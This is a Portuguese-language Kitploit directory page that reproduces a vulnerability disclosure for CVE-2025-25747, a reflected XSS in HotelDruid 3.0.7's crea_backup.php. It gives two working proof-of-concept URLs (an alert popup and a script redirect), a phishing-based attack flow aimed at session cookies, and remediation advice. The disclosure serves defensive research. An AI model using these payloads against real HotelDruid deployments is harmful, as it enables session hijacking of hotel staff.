Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-25747-HotelDruid-3-0-7-Reflected-XSS — Prova de conceito de vulnerabilidade XSS refletida para HotelDruid 3.0.7, demonstrando execução arbitrária de JavaScript através do parâmetro ripristina_backup em crea_backup.php. | Kitploit
Ferramentas/GitHubGitHub/huyvo2910/cve-2025-25747-hoteldruid-3-0-7-reflected-xss
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de Penetração
GitHubhuyvo2910/cve-2025-25747-hoteldruid-3-0-7-reflected-xss

CVE-2025-25747-HotelDruid-3-0-7-Reflected-XSS

Prova de conceito de vulnerabilidade XSS refletida para HotelDruid 3.0.7, demonstrando execução arbitrária de JavaScript através do parâmetro ripristina_backup em crea_backup.php.

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-25747 - Vulnerabilidade XSS Refletida no HotelDruid 3.0.7

Descrição

Vulnerabilidade de Cross Site Scripting no DigitalDruid HotelDruid v.3.0.7 permite que um atacante execute código arbitrário e obtenha informações sensíveis por meio do parâmetro ripristina_backup no endpoint crea_backup.php


Gravidade e Impacto

Impacto

Um atacante pode enganar um usuário autenticado para que visite uma URL maliciosa, o que desencadeará JavaScript malicioso no navegador. As consequências potenciais incluem:

  • Sequestro de Sessão: Um atacante pode roubar cookies de sessão, obtendo acesso não autorizado à conta do usuário.
  • Phishing ou Distribuição de Malware: O usuário pode ser redirecionado para sites maliciosos, ou scripts controlados pelo atacante podem injetar conteúdo malicioso diretamente na interface.
  • Abuso de Privilégios Administrativos: Se explorado contra um administrador, o atacante pode modificar configurações do sistema ou manipular dados sensíveis.

Prova de Conceito (PoC)

PoC 1 - Injeção de Alerta

root@kitploit:~
http://localhost/hoteldruid/crea_backup.php?anno=2025&id_sessione=<valid_session_id>&azione=SI&ripristina_backup=%22%3E%3CscrIpt%3Ealert%28%27Huy%20Vo%20Found%20This%20Vulnerability%27%29%3B%3C%2FscrIpt%3E&dati_conn=attuali&mantieni_anni=1

Resultado: Um popup de alerta com a mensagem “Huy Vo Found This Vulnerability” confirma a execução bem-sucedida do XSS.

PoC 2 - Redirecionamento Externo

root@kitploit:~
http://localhost/hoteldruid/crea_backup.php?anno=2025&id_sessione=<valid_session_id>&azione=SI&ripristina_backup="><scrIpt>window.location.href='https://www.facebook.com';</scrIpt>&dati_conn=attuali&mantieni_anni=1

Resultado: O navegador redireciona automaticamente para o Facebook.


Análise

Contexto

HotelDruid é um sistema de gerenciamento de propriedades de código aberto usado para gerenciar reservas, quartos e faturamento para hotéis, pensões e outros negócios de hospitalidade. É baseado na web, normalmente instalado em servidores locais e acessado via navegador. Dada sua interface web e natureza administrativa, uma segurança robusta é crucial — especialmente para funções autenticadas.


Detalhes da Vulnerabilidade

O endpoint crea_backup.php processa o parâmetro ripristina_backup sem sanitização ou codificação, refletindo diretamente a entrada do usuário na página. Isso permite que um atacante crie uma URL maliciosa que injeta JavaScript arbitrário na página renderizada para um usuário autenticado.

Principais Detalhes Técnicos

  • Parâmetro Afetado: ripristina_backup
  • Endpoint Afetado: crea_backup.php
  • Tipo de Ataque: Cross-Site Scripting Refletido (XSS)
  • Pré-condição: Requer uma sessão autenticada válida (id_sessione)

Fluxo do Ataque

  1. O atacante cria uma URL maliciosa com o payload injetado em ripristina_backup.
  2. O atacante envia esta URL para uma vítima autenticada (por exemplo, via e-mail de phishing, mensagem de chat).
  3. A vítima clica na URL enquanto autenticada, acionando o JavaScript malicioso em seu navegador.
  4. O script é executado no contexto da sessão da vítima, permitindo:
    • Roubo de cookie de sessão (se HttpOnly não estiver definido)
    • Redirecionamento para sites controlados pelo atacante
    • Injeção de conteúdo malicioso na interface

Mitigação / Correção

Recomendações para Desenvolvedores

  • Validação de Entrada: Valide toda a entrada fornecida pelo usuário no lado do servidor.
  • Codificação de Saída: Codifique adequadamente toda a saída antes de renderizar (por exemplo, use htmlspecialchars() em PHP para codificar caracteres < e >).
  • Política de Segurança de Conteúdo (CSP): Implemente uma Política de Segurança de Conteúdo rigorosa para reduzir o impacto de scripts injetados.
  • Gerenciamento de Sessão: Garanta que as sessões não sejam expostas em parâmetros GET (use cookies seguros com flags HttpOnly e SameSite).

Linha do Tempo e Créditos

  • Data da Descoberta: Januart 16, 2025
  • Notificação ao Fornecedor: January 17, 2025
  • Atribuição MITRE CVE: CVE-2025-25747, February 27 2025
  • Divulgação Pública: March 7, 2025
  • Pesquisador: Huy Vo (Pesquisador de Segurança)
Baixar ferramenta